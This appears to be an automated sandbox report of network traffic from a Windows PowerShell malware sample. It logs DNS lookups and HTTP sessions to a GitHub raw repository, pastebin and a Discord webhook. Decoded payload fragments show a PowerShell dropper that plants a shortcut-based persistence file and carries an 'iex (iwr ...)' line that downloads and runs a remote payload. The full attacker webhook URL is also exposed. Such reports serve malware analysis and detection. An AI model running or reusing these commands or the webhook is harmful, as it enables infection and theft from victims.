                                                                                        Oct 15, 2024 15:54:40.488461971 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.490360022 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.490366936 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.490695000 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.491724968 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.539400101 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618683100 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618812084 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618861914 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618864059 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.618881941 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618935108 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618947029 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.618952036 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.618999958 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.619316101 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.627470970 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.627543926 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:40.652196884 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:45.517879963 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:45.517936945 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:45.518009901 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:45.518357992 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:45.518376112 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.155016899 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.155379057 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:46.156440973 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:46.156450033 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.156697035 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.159231901 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:46.203406096 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.203938961 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:46.203944921 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.501034021 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.501163006 CEST44355624162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:46.501321077 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:46.522712946 CEST55624443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:51.557235956 CEST5561380192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:52.971724033 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:52.971780062 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:52.971854925 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:52.972305059 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:52.972313881 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.582803011 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.582894087 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:53.584183931 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:53.584192991 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.584428072 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.585267067 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:53.627446890 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.627948046 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:53.627969980 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.884762049 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.884912968 CEST44355625162.159.138.232192.168.2.12
                                                                                        Oct 15, 2024 15:54:53.885122061 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:53.891022921 CEST55625443192.168.2.12162.159.138.232
                                                                                        Oct 15, 2024 15:54:58.933748960 CEST5561980192.168.2.12104.20.4.235
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 15:54:08.983006954 CEST | 52814 | 53 | 192.168.2.12 | 1.1.1.1
Oct 15, 2024 15:54:08.990437984 CEST | 53 | 52814 | 1.1.1.1 | 192.168.2.12
Oct 15, 2024 15:54:26.102683067 CEST | 53 | 64107 | 1.1.1.1 | 192.168.2.12
Oct 15, 2024 15:54:27.807394981 CEST | 53 | 65490 | 1.1.1.1 | 192.168.2.12
Oct 15, 2024 15:54:29.652574062 CEST | 50262 | 53 | 192.168.2.12 | 1.1.1.1
Oct 15, 2024 15:54:29.660701036 CEST | 53 | 50262 | 1.1.1.1 | 192.168.2.12
Oct 15, 2024 15:54:30.219273090 CEST | 62058 | 53 | 192.168.2.12 | 1.1.1.1
Oct 15, 2024 15:54:30.226171970 CEST | 53 | 62058 | 1.1.1.1 | 192.168.2.12
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 15, 2024 15:54:08.983006954 CEST | 192.168.2.12 | 1.1.1.1 | 0xa786 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:29.652574062 CEST | 192.168.2.12 | 1.1.1.1 | 0x84df | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:30.219273090 CEST | 192.168.2.12 | 1.1.1.1 | 0x9b3a | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 15, 2024 15:54:08.990437984 CEST | 1.1.1.1 | 192.168.2.12 | 0xa786 | No error (0) | raw.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:08.990437984 CEST | 1.1.1.1 | 192.168.2.12 | 0xa786 | No error (0) | raw.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:08.990437984 CEST | 1.1.1.1 | 192.168.2.12 | 0xa786 | No error (0) | raw.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:08.990437984 CEST | 1.1.1.1 | 192.168.2.12 | 0xa786 | No error (0) | raw.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:29.660701036 CEST | 1.1.1.1 | 192.168.2.12 | 0x84df | No error (0) | discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:29.660701036 CEST | 1.1.1.1 | 192.168.2.12 | 0x84df | No error (0) | discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:29.660701036 CEST | 1.1.1.1 | 192.168.2.12 | 0x84df | No error (0) | discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:29.660701036 CEST | 1.1.1.1 | 192.168.2.12 | 0x84df | No error (0) | discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:29.660701036 CEST | 1.1.1.1 | 192.168.2.12 | 0x84df | No error (0) | discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:30.226171970 CEST | 1.1.1.1 | 192.168.2.12 | 0x9b3a | No error (0) | pastebin.com |  | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:30.226171970 CEST | 1.1.1.1 | 192.168.2.12 | 0x9b3a | No error (0) | pastebin.com |  | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:30.226171970 CEST | 1.1.1.1 | 192.168.2.12 | 0x9b3a | No error (0) | pastebin.com |  | 104.20.3.235 | A (IP address) | IN (0x0001) | false
• raw.githubusercontent.com
• discord.com
• pastebin.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.12 | 49711 | 185.199.109.133 | 80 | 7056 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:54:09.024914026 CEST | 242 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 15:54:09.616374969 CEST | 561 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:54:09 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120035-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000450.551140,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 13:59:09 GMT
Vary: Authorization,Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.12 | 55613 | 104.20.4.235 | 80 | 6988 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:54:30.242310047 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
Oct 15, 2024 15:54:30.858222961 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:54:30 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 14:54:30 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d304d2e5a2a2e27-DFW
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.12 | 55616 | 185.199.109.133 | 80 | 6988 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:54:31.684456110 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 15:54:32.330882072 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:54:32 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210140-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000472.214849,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 13:59:32 GMT
Vary: Authorization,Accept-Encoding


                                                                                        Session ID: 3 | Source IP: 192.168.2.12 | Source Port: 55619 | Destination IP: 104.20.4.235 | Destination Port: 80 | PID: 2132 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Oct 15, 2024 15:54:37.850070000 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: pastebin.com
                                                                                        Connection: Keep-Alive
                                                                                        Oct 15, 2024 15:54:38.476238012 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                                                        Date: Tue, 15 Oct 2024 13:54:38 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 167
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: max-age=3600
                                                                                        Expires: Tue, 15 Oct 2024 14:54:38 GMT
                                                                                        Location: https://pastebin.com/raw/sA04Mwk2
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d304d5dfadee936-DFW
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session ID: 4 | Source IP: 192.168.2.12 | Source Port: 55621 | Destination IP: 185.199.109.133 | Destination Port: 80 | PID: 2132 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Oct 15, 2024 15:54:39.273380995 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        Oct 15, 2024 15:54:39.866935015 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                                                        Connection: close
                                                                                        Content-Length: 0
                                                                                        Server: Varnish
                                                                                        Retry-After: 0
                                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Tue, 15 Oct 2024 13:54:39 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdfw8210164-DFW
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 0
                                                                                        X-Timer: S1729000480.801547,VS0,VE0
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Expires: Tue, 15 Oct 2024 13:59:39 GMT
                                                                                        Vary: Authorization,Accept-Encoding


                                                                                        Session ID: 0 | Source IP: 192.168.2.12 | Source Port: 49712 | Destination IP: 185.199.109.133 | Destination Port: 443 | PID: 7056 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-15 13:54:10 UTC | 242 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:10 UTC | 901 | IN | HTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 7088
                                                                                        Cache-Control: max-age=300
                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        ETag: "6e4c41fcadb09e4c44f95bcd21966ae888aebf2d5f8b0bcd34ef015521114ea0"
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: deny
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        X-GitHub-Request-Id: 5B18:1AF8D8:AD9A7D:BD5271:670E73FF
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Tue, 15 Oct 2024 13:54:10 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdfw8210047-DFW
                                                                                        X-Cache: MISS
                                                                                        X-Cache-Hits: 0
                                                                                        X-Timer: S1729000451.638466,VS0,VE106
                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Fastly-Request-ID: 13a79995234a8a5bb11cdccc22c54a1db28f4287
                                                                                        Expires: Tue, 15 Oct 2024 13:59:10 GMT
                                                                                        Source-Age: 0
                                                                                        2024-10-15 13:54:10 UTC | 1378 | IN | Data Raw: 73 6c 65 65 70 20 35 0a 0a 23 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 24 65 6e 76 3a 74 6d 70 5c 44 72 69 76 65 72 44 69 61 67 2e 64 6c 6c 22 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 0a 24 63 75 72 72 65 6e 74 50 61 74 68 20 3d 20 5b 53 79 73 74 65 6d 2e 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 22 50 41 54 48 22 2c 20 22 55 73 65 72 22 29 0a 24 6e 65 77 50 61 74 68 20 3d 20 24 63
                                                                                        Data Ascii: sleep 5#$googoogaagaa = "$env:tmp\DriverDiag.dll"$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $c
                                                                                        2024-10-15 13:54:10 UTC | 1378 | IN | Data Raw: 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 34 34 2c 34 32 2c 34 31 2c 38 39 2c 38 2c 31 38 36 2c 34 36 2c 30 2c 30 2c 30 2c 32 34 36 2c 32 35 2c 30 2c 30 2c 30 2c 30 2c 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 32 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 34 36 2c 32 33 38 2c 32 38 2c 31 2c 38 37 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 31 35 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 39 30 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 33 36 2c 38 39 2c 31 30 34 2c 31 38 33 2c 31 36 2c 30 2c 38 33 2c 31 32 31 2c 31 31 35 2c 31 31 36 2c 31 30 31 2c 31 30 39 2c 35 31 2c 35 30 2c 30 2c 30 2c 36 36 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34
                                                                                        Data Ascii: 0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84
                                                                                        2024-10-15 13:54:10 UTC | 1378 | IN | Data Raw: 34 37 2c 30 2c 39 39 2c 30 2c 33 32 2c 30 2c 33 34 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 39 39 2c 30 2c 31 31 31 2c 30 2c 31 30 39 2c 30 2c 31 30 39 2c 30 2c 39 37 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 33 32 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 31 31 39 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31
                                                                                        Data Ascii: 47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111
                                                                                        2024-10-15 13:54:10 UTC | 1378 | IN | Data Raw: 31 30 2c 32 33 39 2c 31 37 2c 31 35 30 2c 31 39 34 2c 32 31 32 2c 32 31 36 2c 38 33 2c 31 33 33 2c 32 34 2c 31 37 2c 37 33 2c 32 2c 30 2c 30 2c 39 2c 30 2c 30 2c 31 36 30 2c 38 39 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 32 33 37 2c 34 38 2c 31 38 39 2c 32 31 38 2c 36 37 2c 30 2c 31 33 37 2c 37 31 2c 31 36 37 2c 32 34 38 2c 32 30 38 2c 31 39 2c 31 36 34 2c 31 31 35 2c 31 30 32 2c 33 34 2c 36 31 2c 30 2c 30 2c 30 2c 31 30 30 2c 30 2c 30 2c 30 2c 30 2c 33 31 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 30 2c 30 2c 38 33 2c 30 2c 31 32 31 2c 30 2c 31 31 35 2c 30 2c 31 31 36 2c 30 2c 31 30 31 2c 30 2c 31 30 39 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 33 32 2c 30 2c 34 30 2c 30 2c 36 37 2c 30 2c 35 38 2c 30 2c 39 32 2c 30 2c 38 37 2c 30 2c 31 30 35 2c 30
                                                                                        Data Ascii: 10,239,17,150,194,212,216,83,133,24,17,73,2,0,0,9,0,0,160,89,0,0,0,49,83,80,83,237,48,189,218,67,0,137,71,167,248,208,19,164,115,102,34,61,0,0,0,100,0,0,0,0,31,0,0,0,22,0,0,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,40,0,67,0,58,0,92,0,87,0,105,0
                                                                                        2024-10-15 13:54:10 UTC | 1378 | IN | Data Raw: 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 35 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 31 37 37 2c 32 32 2c 31 30 39 2c 36 38 2c 31 37 33 2c 31 34 31 2c 31 31 32 2c 37 32 2c 31 36 37 2c 37 32 2c 36 34 2c 34 36 2c 31 36 34 2c 36 31 2c 31 32 30 2c 31 34 30 2c 32 39 2c 30 2c 30 2c 30 2c 31 30 34 2c 30 2c 30 2c 30 2c 30 2c 37 32 2c 30 2c 30 2c 30 2c 31 32 37 2c 31 30 35 2c 31 39 34 2c 32 32 34 2c 32 31 37 2c 38 38 2c 32 34 38 2c 37 35 2c 31 33 38 2c 32 35 32 2c 32 36 2c 36 30 2c 36 36 2c 34 39 2c 34 2c 37 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 29 0a 24 72 65 63 6f 6e 73 74 72 75
                                                                                        Data Ascii: 108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,0,0,0,0,0,0,57,0,0,0,49,83,80,83,177,22,109,68,173,141,112,72,167,72,64,46,164,61,120,140,29,0,0,0,104,0,0,0,0,72,0,0,0,127,105,194,224,217,88,248,75,138,252,26,60,66,49,4,72,0,0,0,0,0,0,0,0,0,0,0,0)$reconstru
                                                                                        2024-10-15 13:54:10 UTC | 198 | IN | Data Raw: 74 70 75 74 20 22 46 61 69 6c 65 64 20 74 6f 20 73 65 6e 64 20 6d 65 73 73 61 67 65 2e 20 45 72 72 6f 72 3a 20 24 5f 22 0a 7d 0a 23 73 74 61 72 74 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 64 6f 77 73 74 79 6c 65 20 68 20 2d 61 72 67 73 20 27 69 65 78 20 28 69 77 72 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 4e 65 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 5f 70 79 6c 64 2e 74 78 74 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 27 0a 0a 7d 0a
                                                                                        Data Ascii: tput "Failed to send message. Error: $_"}#start powershell -windowstyle h -args 'iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)'}


                                                                                        Session ID: 1 | Source IP: 192.168.2.12 | Source Port: 55611 | Destination IP: 162.159.138.232 | Destination Port: 443 | PID: 7056 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-15 13:54:30 UTC | 311 | OUT | POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Content-Type: application/json
                                                                                        Host: discord.com
                                                                                        Content-Length: 217
                                                                                        Connection: Keep-Alive
